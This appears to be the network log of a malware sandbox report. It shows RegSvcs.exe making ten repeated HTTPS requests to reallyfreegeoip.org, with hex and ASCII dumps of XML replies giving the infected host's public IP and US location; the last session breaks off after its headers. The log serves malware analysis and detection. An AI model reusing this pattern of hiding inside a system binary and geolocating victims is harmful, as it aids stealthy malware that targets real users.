                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.749701188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:05 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:05 UTC708INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:05 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78316
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tY6AmZdrD5Yl3TTSSQlncAuMEGE08ONy%2F3JkooHSLJ14bYsLwECT0tiIX8ZkV5UYWVAyfEmdOBloh%2BH6whagCU5dtBYJSZqsR%2F2NsFqYyJvs8VXXinh9YrlPnAskS%2Fewh7ANVX2V"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa6d38df32fa-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.749703188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:07 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:07 UTC700INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:07 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78318
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlUoaLTPF4HDV2nKNOvLX2XqloS8bQvCDEG8wORl7G7nEYUT3NmjB32fVVyBBqViRLSpZdDtIuNBwq9rF4dyN827kq0XqsWnfGYAJGJpNjC9pR3LLj2PzgkyFL04ZAncVJGaO5vK"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa768b2a0cac-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:07 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.749705188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:09 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:09 UTC704INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:09 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78320
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MwhBJo6Vw3OSzSy8ooo%2Brxdwjv2l6klIHFWkQntUkBUM97acd5gHGy9q1wSdqN1TltQ77LF2W9EhVXRoyradcKhyfRyUDhVqmmyZXVHXhU2VlcfJCDz9po3HJlCowGnT8Ni4%2ByLN"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa86b8274315-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.749707188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:11 UTC712INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:11 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78322
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gyMA%2BICjiAaJypzbbWP%2BJ5a26Wsu2E4EAJoJPYAZ8TJ7SL%2F4L4d0hqbeDoSitJVtPo%2Fr22X98jELCJT%2FHye03baglZrNWwOnBjysWFxjMNJ4%2FoC36hFzMbEQKiUNlr4sqAOfRyto"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa90ebc70f81-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.749709188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:13 UTC710INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:13 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78324
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WfmheCoftdjWAc0bSL%2BCRW2FfVsKBvNfWptRWl8Q3Ps%2F2lSM2ODW3nGvh9oKYCDrhlfctVKgeNd20qm04%2FRaRYIjHs0Ba74zvZgP5vPc%2Bh6igKNljKlrY%2F46McdiuORHFZBDGli"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa9b8fa00ccd-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.749711188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:14 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:15 UTC708INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:15 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78326
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ebjYTYbGUUhRuRvZ%2FJMPj12SLp3f%2FonlgN61hZjvuE9n3VSRX1GKYjcs7Hz4ZNZdw5RyHFifW7aWdNDvUDkLOp7DMmiKxGAZhL9xNKHmjoikXEVh3WkZmdEgPJuEsvdmHF%2B%2FXxB"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aaa7ec7c423b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:15 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.749715188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:17 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:17 UTC708INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:17 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78328
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xh%2BxFWYsGp%2B7m6HB%2BunJe22eu7GJiLbCOAQsXou8lSDyj%2FBjWoA0KdDofyKxyeom7tCeTqEeXLISPjdpI7WOe3gv9NWuNhR6qaS7mbUQLbzwQ0RADVxPUVUuSwCqejsqnvkuZ05f"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aab7aa938c1d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.749716188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:17 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:17 UTC702INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:17 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78328
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evAyOb99OEj8FFjiPKxPIRZ3P0fCM2PCc33Co8XSAiNIiV5kag66Zq1S4SiUg6vD%2F5zKzk3gHSCjqnSQlwa6z7yYgwqY0cCtQT2X7h07uhpgw6VCkBJOGzyTYXXwblltGYZRWJtG"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aab86e28728a-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.749719188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:18 UTC718INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:18 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78329
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSURTo%2BiPlILa6BS9zu1AQWWZn%2FmLMA%2F6Zo5%2B%2BcuMiHW0%2F4Xmw%2FfLVdGZp7v4vtOJtlY6UrHyJOaR%2F4tGauar5hHpqvvVflhcHy03xHM%2BBJPYuZD3tpDqUOtHC1CkAODqbUtKn4i"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aabe0bf34386-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.749723188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:20 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:20 UTC708INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:20 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78331
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5GLGIwnz5Pr7seiZd4jtcO6R9xoRAIwDriZ5GBYpIgrCL1e225UwDWmEYPZPMgbrX7eOnggZu60TyvgQDu9tvbdR%2Fd1Ta%2B3baKise3gOTFn8pfskAOn%2BHszkENDfhrbh3C%2F95mcU"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aacc0fea0c96-EWR
                                                  alt-svc: h3=":443"; ma=86400
